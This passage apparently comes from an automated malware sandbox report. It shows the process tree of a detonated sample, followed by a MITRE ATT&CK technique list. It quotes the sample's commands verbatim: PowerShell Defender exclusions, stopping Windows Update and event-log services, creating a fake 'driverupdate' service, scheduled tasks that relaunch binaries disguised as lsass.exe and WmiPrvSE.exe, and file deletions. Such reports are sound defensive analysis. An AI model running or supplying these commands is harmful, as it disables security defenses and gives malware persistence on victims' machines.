        C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: FT9V-J64C
        5⤵
        
        PID:2656
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: B3CU-SSG5
      4⤵
      PID:2108
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: B3CU-SSG5
        5⤵
        
        PID:320
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: P62C-DLV4
      4⤵
      PID:1864
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: P62C-DLV4
        5⤵
        
        PID:1508
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: ZCE2-ATHU
      4⤵
      PID:2512
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: ZCE2-ATHU
        5⤵
        
        PID:1640
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: 2NGB-7I2R
      4⤵
      PID:1524
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: 2NGB-7I2R
        5⤵
        
        PID:1860
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 63C3-182N
      4⤵
      PID:1960
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 63C3-182N
        5⤵
        
        PID:1764
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: UCL4-MZ9V
      4⤵
      PID:1796
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: UCL4-MZ9V
        5⤵
        
        PID:2572
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: MV0C-3TBE
      4⤵
      PID:1544
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: MV0C-3TBE
        5⤵
        
        PID:1548
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: EOAC-3AKH
      4⤵
      PID:840
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: EOAC-3AKH
        5⤵
        
        PID:2404
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: CF18-LAZP
      4⤵
      PID:2000
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: CF18-LAZP
        5⤵
        
        PID:2688
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 6920-HUEI
      4⤵
      PID:1412
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 6920-HUEI
        5⤵
        
        PID:936
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg
      4⤵
      PID:740
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm
      4⤵
      PID:2344
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe
      4⤵
      PID:380
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys
      4⤵
      PID:944
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys
      4⤵
      PID:2464
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
      4⤵
      PID:2896
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat
      4⤵
      PID:1720
- - C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe
    "C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2528
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ChainReview\4N7V2tIOe7KSQ8eET3YGuCyK2Y.vbe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2516
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\ChainReview\8xoM57ln5l3nWVEqwKA0TDOQ0Am35EOuQMtKP.bat" "
        5⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:1804
      - C:\ChainReview\sphyperRuntimedhcpSvc.exe
        
        "C:\ChainReview/sphyperRuntimedhcpSvc.exe"
        6⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:1548
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainReview\lsass.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2360
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainReview\lsass.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1296
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\DevManView.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2208
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Photo Viewer\es-ES\sphyperRuntimedhcpSvc.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1816
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows NT\Accessories\en-US\WmiPrvSE.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2348
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Ar9jVUwxcl.bat"
        7⤵
        
        PID:2384
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:960
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2128
        
        C:\ChainReview\lsass.exe
        
        "C:\ChainReview\lsass.exe"
        8⤵
        Executes dropped EXE
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:1104
- - C:\Users\Admin\AppData\Roaming\conhostsft.exe
    "C:\Users\Admin\AppData\Roaming\conhostsft.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    PID:2576
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1944
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:2184
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        Drops file in Windows directory
        
        PID:1276
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:2128
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:3040
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:1552
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:1544
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:2432
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:2180
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:2888
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:3012
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      PID:1740
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "driverupdate"
      4⤵
      Launches sc.exe
      PID:2740
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:600
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:1924
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "driverupdate"
      4⤵
      Launches sc.exe
      PID:1080
- - C:\Users\Admin\AppData\Roaming\VC_redistx64.exe
    "C:\Users\Admin\AppData\Roaming\VC_redistx64.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2252
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:836
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn MyApp /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:1496

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding
1⤵
PID:832

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\ChainReview\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1576

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\ChainReview\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2608

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\ChainReview\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2904

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\ChainReview\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2784

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\ChainReview\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2092

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\ChainReview\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2288

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DevManViewD" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\DevManView.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2896

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DevManView" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\DevManView.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2716

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DevManViewD" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\DevManView.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:860

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sphyperRuntimedhcpSvcs" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Photo Viewer\es-ES\sphyperRuntimedhcpSvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2440

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sphyperRuntimedhcpSvc" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\es-ES\sphyperRuntimedhcpSvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2060

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sphyperRuntimedhcpSvcs" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Photo Viewer\es-ES\sphyperRuntimedhcpSvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1484

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows NT\Accessories\en-US\WmiPrvSE.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3052

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows NT\Accessories\en-US\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1336

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows NT\Accessories\en-US\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1388

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-976135872-1179310716167506550392367575-20682311047378218842700361839360724"
1⤵
PID:2684

C:\Windows\system32\taskeng.exe
taskeng.exe {AD195FC4-2186-4D84-A080-D116F449BCCF} S-1-5-21-3551809350-4263495960-1443967649-1000:NNYJZAHP\Admin:Interactive:[1]
1⤵
PID:1820
- C:\Users\Admin\AppData\Roaming\service.exe
  C:\Users\Admin\AppData\Roaming\service.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:2460
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2056
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn MyApp /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:2052

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2083295447889200909-1361450685975516537290938919-126375461-58803908267522463"
1⤵
PID:3044

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "764814924-1803754191789692957438554637-10191585061889043146264860434-1794161308"
1⤵
PID:2144

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-8293127641458547331644094711665780108-177358760117872606594102984691047309504"
1⤵
PID:2532

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1643301586-1257545915-1134654605-1249802013-334121957-128398996-669407846-1717988885"
1⤵
PID:2240

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-52613955314538208878445247684154934171386519218-340137185-1516406481405133080"
1⤵
PID:2620

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1116845849-114908112-872591526-11285344301407558508-181747202-181601524-29033239"
1⤵
PID:1496

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "21244566258499418241637719016-5121107521596657120-303120026-15083976722041291840"
1⤵
PID:3048

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1591280338-1612277054954825834-2010814166405400717977236612069088446741771929"
1⤵
PID:1972

C:\ProgramData\VC_redist.x64.exe
C:\ProgramData\VC_redist.x64.exe
1⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:2540
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:2464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:2220
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Drops file in Windows directory
    PID:1996
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:920
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:2476
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:1516
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:760
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:568
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:2372
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:1340
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:1084
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:2164
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:2036

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Indicator Removal

T1070

File Deletion

T1070.004

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

Query Registry

Remote System Discovery

T1018

System Information Discovery